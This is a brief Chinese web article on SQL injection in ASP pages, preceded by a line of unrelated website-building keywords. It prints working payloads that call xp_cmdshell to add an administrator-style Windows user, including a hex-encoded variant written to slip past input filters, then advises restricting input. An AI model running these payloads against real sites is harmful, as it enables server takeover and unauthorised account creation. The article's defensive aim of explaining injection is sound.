哪有免费做网站,网站可以做哪些广告,哈尔滨网站设计公司地址,一流本科专业建设网站在防范sql注入时#xff0c;对变量过滤不足甚至没有过滤而构造畸形SQL语句#xff0c;极有可能被成功注入#xff0c;比如下面这行sql#xff0c;相当轻松就注入成功了#xff1a;代码示例:http://www./show.asp?id1;exec master.dbo.xp_cmdshell net user angel pass /a…在防范sql注入时对变量过滤不足甚至没有过滤而构造畸形SQL语句极有可能被成功注入比如下面这行sql相当轻松就注入成功了代码示例:http://www./show.asp?id1;exec master.dbo.xp_cmdshell net user angel pass /add;--大家可能觉得变量过滤了就可以防止SQL Injection攻击仅仅过滤是不够的在被过滤的情况下我们照样玩看下面语句代码示例:http://www./show.asp?id1;declare%20a%20sysname%20select%20a0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20a;--是不是跟上面的那句有很大区别可是效果完全是一样的其实这些都是SQL语句。0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400这句是“net user angel pass /add”的16进制格式。先声明一个变量a然后把指令赋值给a然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下代码示例:declare a sysnameselect aexec master.dbo.xp_cmdshell a解决办法过滤变量限制只允许输入特定字符。比如对于数字类型的变量就限制只能输入数字类型的数据。具体在程序中的操作方法大家在编程时自行实践与总结从细节入手对于防范sql 注入务必处处用心啊。
